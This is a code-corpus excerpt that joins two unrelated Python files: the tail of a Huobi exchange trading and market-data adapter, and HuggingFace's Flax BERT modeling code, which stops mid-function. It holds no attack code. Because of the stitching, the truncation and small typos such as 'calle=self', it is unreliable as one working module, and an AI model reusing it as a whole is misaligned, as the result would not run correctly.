if status == ORDER_STATUS_PARTIAL_FILLED or status == ORDER_STATUS_FILLED:
self._update_fill(order_info, tm)
def _update_order_and_fill_old_style(self, msg):
""" 更新订单信息
@param msg 订单信息
"""
#{'op': 'notify', 'ts': 1575268899866, 'topic': 'orders.trxeth', 'data': {'seq-id': 100418110944, 'order-id': 58326818953, 'symbol': 'trxeth', 'account-id': 11261082, 'order-amount': '10', 'order-price': '0.000104', 'created-at': 1575268899682, 'order-type': 'buy-limit', 'order-source': 'spot-web', 'order-state': 'filled', 'role': 'taker', 'price': '0.00010399', 'filled-amount': '10', 'unfilled-amount': '0', 'filled-cash-amount': '0.0010399', 'filled-fees': '0.02'}}
#{'op': 'notify', 'ts': 1575269220762, 'topic': 'orders.trxeth', 'data': {'seq-id': 100418116512, 'order-id': 58324882527, 'symbol': 'trxeth', 'account-id': 11261082, 'order-amount': '10', 'order-price': '0.00010376', 'created-at': 1575269220597, 'order-type': 'buy-limit', 'order-source': 'spot-web', 'order-state': 'canceled', 'role': 'taker', 'price': '0.00010376', 'filled-amount': '0', 'unfilled-amount': '10', 'filled-cash-amount': '0', 'filled-fees': '0'}}
#{'op': 'notify', 'ts': 1575269259564, 'topic': 'orders.trxeth', 'data': {'seq-id': 100418116991, 'order-id': 58327457834, 'symbol': 'trxeth', 'account-id': 11261082, 'order-amount': '9.98', 'order-price': '0', 'created-at': 1575269259451, 'order-type': 'sell-market', 'order-source': 'spot-web', 'order-state': 'filled', 'role': 'taker', 'price': '0.00010407', 'filled-amount': '9.98', 'unfilled-amount': '0', 'filled-cash-amount': '0.0010386186', 'filled-fees': '0.0000020772372'}}
#{'op': 'notify', 'ts': 1575269323862, 'topic': 'orders.trxeth', 'data': {'seq-id': 100418118242, 'order-id': 58327583981, 'symbol': 'trxeth', 'account-id': 11261082, 'order-amount': '0.001', 'order-price': '0', 'created-at': 1575269323654, 'order-type': 'buy-market', 'order-source': 'spot-web', 'order-state': 'filled', 'role': 'taker', 'price': '0.00010425', 'filled-amount': '9.59232613908872901', 'unfilled-amount': '0', 'filled-cash-amount': '0.000999999999999999', 'filled-fees': '0.019184652278177458'}}
"""
{
'op': 'notify',
'ts': 1575269323862,
'topic': 'orders.trxeth',
'data': {
'seq-id': 100418118242,
'order-id': 58327583981,
'symbol': 'trxeth',
'account-id': 11261082,
'order-amount': '0.001',
'order-price': '0',
'created-at': 1575269323654,
'order-type': 'buy-market',
'order-source': 'spot-web',
'order-state': 'filled',
'role': 'taker',
'price': '0.00010425',
'filled-amount': '9.59232613908872901',
'unfilled-amount': '0',
'filled-cash-amount': '0.000999999999999999',
'filled-fees': '0.019184652278177458'}
}
"""
tm = msg["ts"]
order_info = msg["data"]
symbol = order_info["symbol"]
order_no = str(order_info["order-id"])
action = ORDER_ACTION_BUY if order_info["order-type"] in ["buy-market", "buy-limit", "buy-ioc", "buy-limit-maker", "buy-stop-limit"] else ORDER_ACTION_SELL
if order_info["order-type"] in ["buy-market", "sell-market"]:
order_type = ORDER_TYPE_MARKET
elif order_info["order-type"] in ["buy-ioc", "sell-ioc"]:
order_type = ORDER_TYPE_IOC
else:
order_type = ORDER_TYPE_LIMIT
quantity = float(order_info["order-amount"])
if action == ORDER_ACTION_BUY and order_type == ORDER_TYPE_MARKET:
remain = quantity - float(order_info["filled-cash-amount"]) #市价买单传入的是金额,输出的也要是金额
else:
remain = float(order_info["unfilled-amount"])
ctime = order_info["created-at"]
utime = tm
state = order_info["order-state"]
if state == "canceled":
status = ORDER_STATUS_CANCELED
elif state == "partial-canceled":
status = ORDER_STATUS_CANCELED
elif state == "created":
status = ORDER_STATUS_SUBMITTED
elif state == "submitting":
status = ORDER_STATUS_SUBMITTED
elif state == "submitted":
status = ORDER_STATUS_SUBMITTED
elif state == "partical-filled":
status = ORDER_STATUS_PARTIAL_FILLED
elif state == "filled":
status = ORDER_STATUS_FILLED
else:
logger.error("status error! order_info:", order_info, caller=self)
return
info = {
"platform": self._platform,
"account": self._account,
"strategy": self._strategy,
"order_no": order_no,
"action": action,
"symbol": symbol,
"price": float(order_info["order-price"]),
"quantity": quantity,
"remain": remain,
"status": status,
"order_type": order_type,
"ctime": ctime,
"utime": utime
#avg_price
}
order = Order(**info)
if self.cb.on_order_update_callback:
SingleTask.run(self.cb.on_order_update_callback, order)
#=====================================================================================
# Next, handle the fill callback.
if status == ORDER_STATUS_PARTIAL_FILLED or status == ORDER_STATUS_FILLED:
fill_no = str(order_info["seq-id"])
price = float(order_info["price"]) #成交价格
size = float(order_info["filled-amount"]) #成交数量
side = action
liquidity = LIQUIDITY_TYPE_TAKER if order_info["role"]=="taker" else LIQUIDITY_TYPE_MAKER
fee = float(order_info["filled-fees"])
f = {
"platform": self._platform,
"account": self._account,
"strategy": self._strategy,
"fill_no": fill_no,
"order_no": order_no,
"side": side, #成交方向,买还是卖
"symbol": symbol,
"price": price, #成交价格
"quantity": size, #成交数量
"liquidity": liquidity, #maker成交还是taker成交
"fee": fee,
"ctime": tm
}
fill = Fill(**f)
if self.cb.on_fill_update_callback:
SingleTask.run(self.cb.on_fill_update_callback, fill)
def _update_asset(self, msg):
"""
{
'op': 'notify',
'ts': 1575004687037,
'topic': 'accounts',
'data': {
'event': 'order.cancel',  # Event that caused the asset change, e.g. order creation (order.place), order fill (order.match), fill refund (order.refund), order cancellation (order.cancel), fee deduction via point card (order.fee-refund), margin transfer (margin.transfer), margin loan principal (margin.loan), margin interest (margin.interest), repayment of margin principal and interest (margin.repay), or other asset changes (other).
'list': [
{
'account-id': 10432498,  # Account ID.
'currency': 'eth',  # Currency.
'type': 'trade',  # trade, loan, or interest.
'balance': '0.71762865'  # Account balance (available balance when subscribed with model=0, total balance when model=1).
}
]
}
}
"""
tm = msg["ts"]
account_info = msg["data"]
for d in account_info["list"]:
b = d["balance"]
c = d["currency"]
self._assets[c]["free"] = float(b)
ast = Asset(self._platform, self._account, self._assets, tm, True)
SingleTask.run(self.cb.on_asset_update_callback, ast)
@staticmethod
def mapping_layer():
""" 获取符号映射关系.
Returns:
layer: 符号映射关系
"""
layer = Trader.MAPPING_LAYER()
layer.is_upper = True
layer.map_dict = {
"BTC/USDT": "btcusdt",
"ETH/USDT": "ethusdt",
"EOS/USDT": "eosusdt",
"BCH/USDT": "bchusdt",
"BSV/USDT": "bsvusdt",
"LTC/USDT": "ltcusdt",
"XRP/USDT": "xrpusdt",
"ADA/USDT": "adausdt",
"TRX/USDT": "trxusdt",
#
"ETH/BTC": "ethbtc",
"EOS/BTC": "eosbtc",
"BCH/BTC": "bchbtc",
"BSV/BTC": "bsvbtc",
"LTC/BTC": "ltcbtc",
"XRP/BTC": "xrpbtc",
"ADA/BTC": "adabtc",
"TRX/BTC": "trxbtc",
#
"EOS/ETH": "eoseth",
"TRX/ETH": "trxeth"
}
return layer
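# Minimal usage sketch (added for illustration; assumes Trader/strategy wiring that is not shown
# here): the mapping layer translates unified symbol names into the lowercase strings expected by
# Huobi's REST and websocket APIs.
#
#   layer = Trader.mapping_layer()
#   huobi_symbol = layer.map_dict["BTC/USDT"]   # -> "btcusdt"
#   assert layer.is_upper                       # unified names are upper-case pairs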
class HuobiMarket(Websocket):
""" Huobi Market Server.
"""
def __init__(self, **kwargs):
self.cb = kwargs["cb"]
self._platform = kwargs["platform"]
self._symbols = kwargs["symbols"]
self._wss = "wss://api.huobi.me"
url = self._wss + "/ws"
super(HuobiMarket, self).__init__(url, send_hb_interval=0, **kwargs)
#self.heartbeat_msg = "ping"
self._c_to_s = {} # {"channel": "symbol"}
self._prev_kline_map = defaultdict(lambda:None)
self.initialize()
async def connected_callback(self):
"""After create Websocket connection successfully, we will subscribing orderbook/trade/kline events."""
if self.cb.on_kline_update_callback:
for symbol in self._symbols:
channel = self._symbol_to_channel(symbol, "kline")
if channel:
data = {"sub": channel}
await self.send_json(data)
if self.cb.on_orderbook_update_callback:
for symbol in self._symbols:
channel = self._symbol_to_channel(symbol, "depth")
if channel:
data = {"sub": channel}
await self.send_json(data)
if self.cb.on_trade_update_callback:
for symbol in self._symbols:
channel = self._symbol_to_channel(symbol, "trade")
if channel:
data = {"sub": channel}
await self.send_json(data)
async def process_binary(self, raw):
""" Process binary message that received from Websocket connection.
Args:
raw: Binary message received from Websocket connection.
"""
data = json.loads(gzip.decompress(raw).decode())
logger.debug("data:", json.dumps(data), caller=self)
channel = data.get("ch")
if not channel:
if data.get("ping"):
hb_msg = {"pong": data.get("ping")}
await self.send_json(hb_msg)
return
symbol = self._c_to_s[channel]
if channel.find("kline") != -1:
cur_kline = data["tick"]
if self._prev_kline_map[symbol]:  # A previous kline exists for this symbol.
prev_kline = self._prev_kline_map[symbol]
if prev_kline["id"] != cur_kline["id"]:  # The start times differ, meaning the previous kline is complete, so notify the upper-layer strategy.
info = {
"platform": self._platform,
"symbol": symbol,
"open": prev_kline["open"],
"high": prev_kline["high"],
"low": prev_kline["low"],
"close": prev_kline["close"],
"volume": prev_kline["amount"], #火币现货接口居然用amount表示成交量,vol表示成交额,也是晕了.
"timestamp": prev_kline["id"]*1000, #id字段表示以秒为单位的开始时间,转换为毫秒为单位
"kline_type": MARKET_TYPE_KLINE
}
kline = Kline(**info)
SingleTask.run(self.cb.on_kline_update_callback, kline)
self._prev_kline_map[symbol] = cur_kline
elif channel.find("depth") != -1:
d = data["tick"]
asks = d["asks"][:20] #[[price, quantity],....]
bids = d["bids"][:20]
info = {
"platform": self._platform,
"symbol": symbol,
"asks": asks,
"bids": bids,
"timestamp": d["ts"]
}
ob = Orderbook(**info)
SingleTask.run(self.cb.on_orderbook_update_callback, ob)
elif channel.find("trade") != -1:
tick = data["tick"]
for t in tick["data"]:
info = {
"platform": self._platform,
"symbol": symbol,
"action": ORDER_ACTION_BUY if t["direction"] == "buy" else ORDER_ACTION_SELL,
"price": t["price"],
"quantity": t["amount"],
"timestamp": t["ts"]
}
trade = Trade(**info)
SingleTask.run(self.cb.on_trade_update_callback, trade)
def _symbol_to_channel(self, symbol, channel_type):
""" Convert symbol to channel.
Args:
symbol: Trade pair name.
channel_type: channel name, kline / trade / depth.
"""
if channel_type == "kline":
channel = "market.{s}.kline.1min".format(s=symbol)
elif channel_type == "depth":
channel = "market.{s}.depth.step0".format(s=symbol)
elif channel_type == "trade":
channel = "market.{s}.trade.detail".format(s=symbol)
else:
logger.error("channel type error! channel type:", channel_type, calle=self)
return None
self._c_to_s[channel] = symbol
return channel
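# Illustration only (added commentary, not part of the original file): with the templates above,
# subscribing to BTC/USDT market data uses channel names such as
#
#   market.btcusdt.kline.1min      (1-minute klines)
#   market.btcusdt.depth.step0     (order book, no aggregation)
#   market.btcusdt.trade.detail    (trade ticks)
#
# and self._c_to_s maps each channel name back to its symbol when messages arrive.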
|
src/transformers/models/bert/modeling_flax_bert.py
|
manuelciosici/transformers
| 8,028 |
103049
|
# coding=utf-8
# Copyright 2021 The Google Flax Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Callable, Optional, Tuple
import numpy as np
import flax
import flax.linen as nn
import jax
import jax.numpy as jnp
from flax.core.frozen_dict import FrozenDict, freeze, unfreeze
from flax.linen import combine_masks, make_causal_mask
from flax.linen.attention import dot_product_attention_weights
from flax.traverse_util import flatten_dict, unflatten_dict
from jax import lax
from ...modeling_flax_outputs import (
FlaxBaseModelOutputWithPastAndCrossAttentions,
FlaxBaseModelOutputWithPooling,
FlaxBaseModelOutputWithPoolingAndCrossAttentions,
FlaxCausalLMOutputWithCrossAttentions,
FlaxMaskedLMOutput,
FlaxMultipleChoiceModelOutput,
FlaxNextSentencePredictorOutput,
FlaxQuestionAnsweringModelOutput,
FlaxSequenceClassifierOutput,
FlaxTokenClassifierOutput,
)
from ...modeling_flax_utils import (
ACT2FN,
FlaxPreTrainedModel,
append_call_sample_docstring,
append_replace_return_docstrings,
overwrite_call_docstring,
)
from ...utils import ModelOutput, add_start_docstrings, add_start_docstrings_to_model_forward, logging
from .configuration_bert import BertConfig
logger = logging.get_logger(__name__)
_CHECKPOINT_FOR_DOC = "bert-base-uncased"
_CONFIG_FOR_DOC = "BertConfig"
_TOKENIZER_FOR_DOC = "BertTokenizer"
@flax.struct.dataclass
class FlaxBertForPreTrainingOutput(ModelOutput):
"""
Output type of [`BertForPreTraining`].
Args:
prediction_logits (`jnp.ndarray` of shape `(batch_size, sequence_length, config.vocab_size)`):
Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
seq_relationship_logits (`jnp.ndarray` of shape `(batch_size, 2)`):
Prediction scores of the next sequence prediction (classification) head (scores of True/False continuation
before SoftMax).
hidden_states (`tuple(jnp.ndarray)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `jnp.ndarray` (one for the output of the embeddings + one for the output of each layer) of shape
`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (`tuple(jnp.ndarray)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `jnp.ndarray` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
"""
prediction_logits: jnp.ndarray = None
seq_relationship_logits: jnp.ndarray = None
hidden_states: Optional[Tuple[jnp.ndarray]] = None
attentions: Optional[Tuple[jnp.ndarray]] = None
BERT_START_DOCSTRING = r"""
This model inherits from [`FlaxPreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its models (such as downloading, saving and converting weights from PyTorch models).
This model is also a Flax Linen [flax.linen.Module](https://flax.readthedocs.io/en/latest/flax.linen.html#module)
subclass. Use it as a regular Flax linen Module and refer to the Flax documentation for all matter related to
general usage and behavior.
Finally, this model supports inherent JAX features such as:
- [Just-In-Time (JIT) compilation](https://jax.readthedocs.io/en/latest/jax.html#just-in-time-compilation-jit)
- [Automatic Differentiation](https://jax.readthedocs.io/en/latest/jax.html#automatic-differentiation)
- [Vectorization](https://jax.readthedocs.io/en/latest/jax.html#vectorization-vmap)
- [Parallelization](https://jax.readthedocs.io/en/latest/jax.html#parallelization-pmap)
Parameters:
config ([`BertConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~FlaxPreTrainedModel.from_pretrained`] method to load the model weights.
dtype (`jax.numpy.dtype`, *optional*, defaults to `jax.numpy.float32`):
The data type of the computation. Can be one of `jax.numpy.float32`, `jax.numpy.float16` (on GPUs) and
`jax.numpy.bfloat16` (on TPUs).
This can be used to enable mixed-precision training or half-precision inference on GPUs or TPUs. If
specified all the computation will be performed with the given `dtype`.
**Note that this only specifies the dtype of the computation and does not influence the dtype of model
parameters.**
If you wish to change the dtype of the model parameters, see [`~FlaxPreTrainedModel.to_fp16`] and
[`~FlaxPreTrainedModel.to_bf16`].
"""
BERT_INPUTS_DOCSTRING = r"""
Args:
input_ids (`numpy.ndarray` of shape `({0})`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using [`BertTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`numpy.ndarray` of shape `({0})`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
token_type_ids (`numpy.ndarray` of shape `({0})`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`numpy.ndarray` of shape `({0})`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
head_mask (`numpy.ndarray` of shape `({0})`, *optional*):
Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
class FlaxBertEmbeddings(nn.Module):
"""Construct the embeddings from word, position and token_type embeddings."""
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.word_embeddings = nn.Embed(
self.config.vocab_size,
self.config.hidden_size,
embedding_init=jax.nn.initializers.normal(stddev=self.config.initializer_range),
)
self.position_embeddings = nn.Embed(
self.config.max_position_embeddings,
self.config.hidden_size,
embedding_init=jax.nn.initializers.normal(stddev=self.config.initializer_range),
)
self.token_type_embeddings = nn.Embed(
self.config.type_vocab_size,
self.config.hidden_size,
embedding_init=jax.nn.initializers.normal(stddev=self.config.initializer_range),
)
self.LayerNorm = nn.LayerNorm(epsilon=self.config.layer_norm_eps, dtype=self.dtype)
self.dropout = nn.Dropout(rate=self.config.hidden_dropout_prob)
def __call__(self, input_ids, token_type_ids, position_ids, attention_mask, deterministic: bool = True):
# Embed
inputs_embeds = self.word_embeddings(input_ids.astype("i4"))
position_embeds = self.position_embeddings(position_ids.astype("i4"))
token_type_embeddings = self.token_type_embeddings(token_type_ids.astype("i4"))
# Sum all embeddings
hidden_states = inputs_embeds + token_type_embeddings + position_embeds
# Layer Norm
hidden_states = self.LayerNorm(hidden_states)
hidden_states = self.dropout(hidden_states, deterministic=deterministic)
return hidden_states
class FlaxBertSelfAttention(nn.Module):
config: BertConfig
causal: bool = False
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.head_dim = self.config.hidden_size // self.config.num_attention_heads
if self.config.hidden_size % self.config.num_attention_heads != 0:
raise ValueError(
"`config.hidden_size`: {self.config.hidden_size} has to be a multiple of `config.num_attention_heads`\
: {self.config.num_attention_heads}"
)
self.query = nn.Dense(
self.config.hidden_size,
dtype=self.dtype,
kernel_init=jax.nn.initializers.normal(self.config.initializer_range),
)
self.key = nn.Dense(
self.config.hidden_size,
dtype=self.dtype,
kernel_init=jax.nn.initializers.normal(self.config.initializer_range),
)
self.value = nn.Dense(
self.config.hidden_size,
dtype=self.dtype,
kernel_init=jax.nn.initializers.normal(self.config.initializer_range),
)
if self.causal:
self.causal_mask = make_causal_mask(
jnp.ones((1, self.config.max_position_embeddings), dtype="bool"), dtype="bool"
)
def _split_heads(self, hidden_states):
return hidden_states.reshape(hidden_states.shape[:2] + (self.config.num_attention_heads, self.head_dim))
def _merge_heads(self, hidden_states):
return hidden_states.reshape(hidden_states.shape[:2] + (self.config.hidden_size,))
@nn.compact
# Copied from transformers.models.bart.modeling_flax_bart.FlaxBartAttention._concatenate_to_cache
def _concatenate_to_cache(self, key, value, query, attention_mask):
"""
This function takes projected key, value states from a single input token and concatenates the states to cached
states from previous steps. This function is slightly adapted from the official Flax repository:
https://github.com/google/flax/blob/491ce18759622506588784b4fca0e4bf05f8c8cd/flax/linen/attention.py#L252
"""
# detect if we're initializing by absence of existing cache data.
is_initialized = self.has_variable("cache", "cached_key")
cached_key = self.variable("cache", "cached_key", jnp.zeros, key.shape, key.dtype)
cached_value = self.variable("cache", "cached_value", jnp.zeros, value.shape, value.dtype)
cache_index = self.variable("cache", "cache_index", lambda: jnp.array(0, dtype=jnp.int32))
if is_initialized:
*batch_dims, max_length, num_heads, depth_per_head = cached_key.value.shape
# update key, value caches with our new 1d spatial slices
cur_index = cache_index.value
indices = (0,) * len(batch_dims) + (cur_index, 0, 0)
key = lax.dynamic_update_slice(cached_key.value, key, indices)
value = lax.dynamic_update_slice(cached_value.value, value, indices)
cached_key.value = key
cached_value.value = value
num_updated_cache_vectors = query.shape[1]
cache_index.value = cache_index.value + num_updated_cache_vectors
# causal mask for cached decoder self-attention: our single query position should only attend to those key positions that have already been generated and cached, not the remaining zero elements.
pad_mask = jnp.broadcast_to(
jnp.arange(max_length) < cur_index + num_updated_cache_vectors,
tuple(batch_dims) + (1, num_updated_cache_vectors, max_length),
)
attention_mask = combine_masks(pad_mask, attention_mask)
return key, value, attention_mask
def __call__(
self,
hidden_states,
attention_mask,
layer_head_mask,
key_value_states: Optional[jnp.ndarray] = None,
init_cache: bool = False,
deterministic=True,
output_attentions: bool = False,
):
# if key_value_states are provided this layer is used as a cross-attention layer
# for the decoder
is_cross_attention = key_value_states is not None
batch_size = hidden_states.shape[0]
# get query proj
query_states = self.query(hidden_states)
# get key, value proj
if is_cross_attention:
# cross_attentions
key_states = self.key(key_value_states)
value_states = self.value(key_value_states)
else:
# self_attention
key_states = self.key(hidden_states)
value_states = self.value(hidden_states)
query_states = self._split_heads(query_states)
key_states = self._split_heads(key_states)
value_states = self._split_heads(value_states)
# handle cache prepare causal attention mask
if self.causal:
query_length, key_length = query_states.shape[1], key_states.shape[1]
if self.has_variable("cache", "cached_key"):
mask_shift = self.variables["cache"]["cache_index"]
max_decoder_length = self.variables["cache"]["cached_key"].shape[1]
causal_mask = lax.dynamic_slice(
self.causal_mask, (0, 0, mask_shift, 0), (1, 1, query_length, max_decoder_length)
)
else:
causal_mask = self.causal_mask[:, :, :query_length, :key_length]
causal_mask = jnp.broadcast_to(causal_mask, (batch_size,) + causal_mask.shape[1:])
# combine masks if needed
if attention_mask is not None and self.causal:
attention_mask = jnp.broadcast_to(jnp.expand_dims(attention_mask, axis=(-3, -2)), causal_mask.shape)
attention_mask = combine_masks(attention_mask, causal_mask)
elif self.causal:
attention_mask = causal_mask
elif attention_mask is not None:
attention_mask = jnp.expand_dims(attention_mask, axis=(-3, -2))
# During fast autoregressive decoding, we feed one position at a time,
# and cache the keys and values step by step.
if self.causal and (self.has_variable("cache", "cached_key") or init_cache):
key_states, value_states, attention_mask = self._concatenate_to_cache(
key_states, value_states, query_states, attention_mask
)
# Convert the boolean attention mask to an attention bias.
if attention_mask is not None:
# attention mask in the form of attention bias
attention_bias = lax.select(
attention_mask > 0,
jnp.full(attention_mask.shape, 0.0).astype(self.dtype),
jnp.full(attention_mask.shape, -1e10).astype(self.dtype),
)
else:
attention_bias = None
dropout_rng = None
if not deterministic and self.config.attention_probs_dropout_prob > 0.0:
dropout_rng = self.make_rng("dropout")
attn_weights = dot_product_attention_weights(
query_states,
key_states,
bias=attention_bias,
dropout_rng=dropout_rng,
dropout_rate=self.config.attention_probs_dropout_prob,
broadcast_dropout=True,
deterministic=deterministic,
dtype=self.dtype,
precision=None,
)
# Mask heads if we want to
if layer_head_mask is not None:
attn_weights = jnp.einsum("...hqk,h->...hqk", attn_weights, layer_head_mask)
attn_output = jnp.einsum("...hqk,...khd->...qhd", attn_weights, value_states)
attn_output = attn_output.reshape(attn_output.shape[:2] + (-1,))
outputs = (attn_output, attn_weights) if output_attentions else (attn_output,)
return outputs
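# Added sketch (commentary only, not part of the original file): the boolean attention mask is
# converted into an additive bias so that masked key positions receive a large negative score
# before the softmax. Conceptually, for a mask broadcast to (batch, 1, q_len, kv_len):
#
#   bias = jnp.where(mask > 0, 0.0, -1e10)
#   weights = softmax(query @ key^T / sqrt(head_dim) + bias)   # masked keys get ~zero weight
#
# which is what the `lax.select` call plus `dot_product_attention_weights` implement above.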
class FlaxBertSelfOutput(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.dense = nn.Dense(
self.config.hidden_size,
kernel_init=jax.nn.initializers.normal(self.config.initializer_range),
dtype=self.dtype,
)
self.LayerNorm = nn.LayerNorm(epsilon=self.config.layer_norm_eps, dtype=self.dtype)
self.dropout = nn.Dropout(rate=self.config.hidden_dropout_prob)
def __call__(self, hidden_states, input_tensor, deterministic: bool = True):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states, deterministic=deterministic)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
class FlaxBertAttention(nn.Module):
config: BertConfig
causal: bool = False
dtype: jnp.dtype = jnp.float32
def setup(self):
self.self = FlaxBertSelfAttention(self.config, causal=self.causal, dtype=self.dtype)
self.output = FlaxBertSelfOutput(self.config, dtype=self.dtype)
def __call__(
self,
hidden_states,
attention_mask,
layer_head_mask,
key_value_states=None,
init_cache=False,
deterministic=True,
output_attentions: bool = False,
):
# Attention mask comes in as attention_mask.shape == (*batch_sizes, kv_length)
# FLAX expects: attention_mask.shape == (*batch_sizes, 1, 1, kv_length) such that it is broadcastable
# with attn_weights.shape == (*batch_sizes, num_heads, q_length, kv_length)
attn_outputs = self.self(
hidden_states,
attention_mask,
layer_head_mask=layer_head_mask,
key_value_states=key_value_states,
init_cache=init_cache,
deterministic=deterministic,
output_attentions=output_attentions,
)
attn_output = attn_outputs[0]
hidden_states = self.output(attn_output, hidden_states, deterministic=deterministic)
outputs = (hidden_states,)
if output_attentions:
outputs += (attn_outputs[1],)
return outputs
class FlaxBertIntermediate(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.dense = nn.Dense(
self.config.intermediate_size,
kernel_init=jax.nn.initializers.normal(self.config.initializer_range),
dtype=self.dtype,
)
self.activation = ACT2FN[self.config.hidden_act]
def __call__(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.activation(hidden_states)
return hidden_states
class FlaxBertOutput(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.dense = nn.Dense(
self.config.hidden_size,
kernel_init=jax.nn.initializers.normal(self.config.initializer_range),
dtype=self.dtype,
)
self.dropout = nn.Dropout(rate=self.config.hidden_dropout_prob)
self.LayerNorm = nn.LayerNorm(epsilon=self.config.layer_norm_eps, dtype=self.dtype)
def __call__(self, hidden_states, attention_output, deterministic: bool = True):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states, deterministic=deterministic)
hidden_states = self.LayerNorm(hidden_states + attention_output)
return hidden_states
class FlaxBertLayer(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.attention = FlaxBertAttention(self.config, causal=self.config.is_decoder, dtype=self.dtype)
self.intermediate = FlaxBertIntermediate(self.config, dtype=self.dtype)
self.output = FlaxBertOutput(self.config, dtype=self.dtype)
if self.config.add_cross_attention:
self.crossattention = FlaxBertAttention(self.config, causal=False, dtype=self.dtype)
def __call__(
self,
hidden_states,
attention_mask,
layer_head_mask,
encoder_hidden_states: Optional[jnp.ndarray] = None,
encoder_attention_mask: Optional[jnp.ndarray] = None,
init_cache: bool = False,
deterministic: bool = True,
output_attentions: bool = False,
):
# Self Attention
attention_outputs = self.attention(
hidden_states,
attention_mask,
layer_head_mask=layer_head_mask,
init_cache=init_cache,
deterministic=deterministic,
output_attentions=output_attentions,
)
attention_output = attention_outputs[0]
# Cross-Attention Block
if encoder_hidden_states is not None:
cross_attention_outputs = self.crossattention(
attention_output,
attention_mask=encoder_attention_mask,
layer_head_mask=layer_head_mask,
key_value_states=encoder_hidden_states,
deterministic=deterministic,
output_attentions=output_attentions,
)
attention_output = cross_attention_outputs[0]
hidden_states = self.intermediate(attention_output)
hidden_states = self.output(hidden_states, attention_output, deterministic=deterministic)
outputs = (hidden_states,)
if output_attentions:
outputs += (attention_outputs[1],)
if encoder_hidden_states is not None:
outputs += (cross_attention_outputs[1],)
return outputs
class FlaxBertLayerCollection(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.layers = [
FlaxBertLayer(self.config, name=str(i), dtype=self.dtype) for i in range(self.config.num_hidden_layers)
]
def __call__(
self,
hidden_states,
attention_mask,
head_mask,
encoder_hidden_states: Optional[jnp.ndarray] = None,
encoder_attention_mask: Optional[jnp.ndarray] = None,
init_cache: bool = False,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
all_attentions = () if output_attentions else None
all_hidden_states = () if output_hidden_states else None
all_cross_attentions = () if (output_attentions and encoder_hidden_states is not None) else None
# Check if head_mask has a correct number of layers specified if desired
if head_mask is not None:
if head_mask.shape[0] != len(self.layers):
raise ValueError(
f"The head_mask should be specified for {len(self.layers)} layers, but it is for "
f"{head_mask.shape[0]}."
)
for i, layer in enumerate(self.layers):
if output_hidden_states:
all_hidden_states += (hidden_states,)
layer_outputs = layer(
hidden_states,
attention_mask,
layer_head_mask=head_mask[i] if head_mask is not None else None,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
init_cache=init_cache,
deterministic=deterministic,
output_attentions=output_attentions,
)
hidden_states = layer_outputs[0]
if output_attentions:
all_attentions += (layer_outputs[1],)
if encoder_hidden_states is not None:
all_cross_attentions += (layer_outputs[2],)
if output_hidden_states:
all_hidden_states += (hidden_states,)
outputs = (hidden_states,)
if not return_dict:
return tuple(v for v in outputs if v is not None)
return FlaxBaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
hidden_states=all_hidden_states,
attentions=all_attentions,
cross_attentions=all_cross_attentions,
)
class FlaxBertEncoder(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.layer = FlaxBertLayerCollection(self.config, dtype=self.dtype)
def __call__(
self,
hidden_states,
attention_mask,
head_mask,
encoder_hidden_states: Optional[jnp.ndarray] = None,
encoder_attention_mask: Optional[jnp.ndarray] = None,
init_cache: bool = False,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
return self.layer(
hidden_states,
attention_mask,
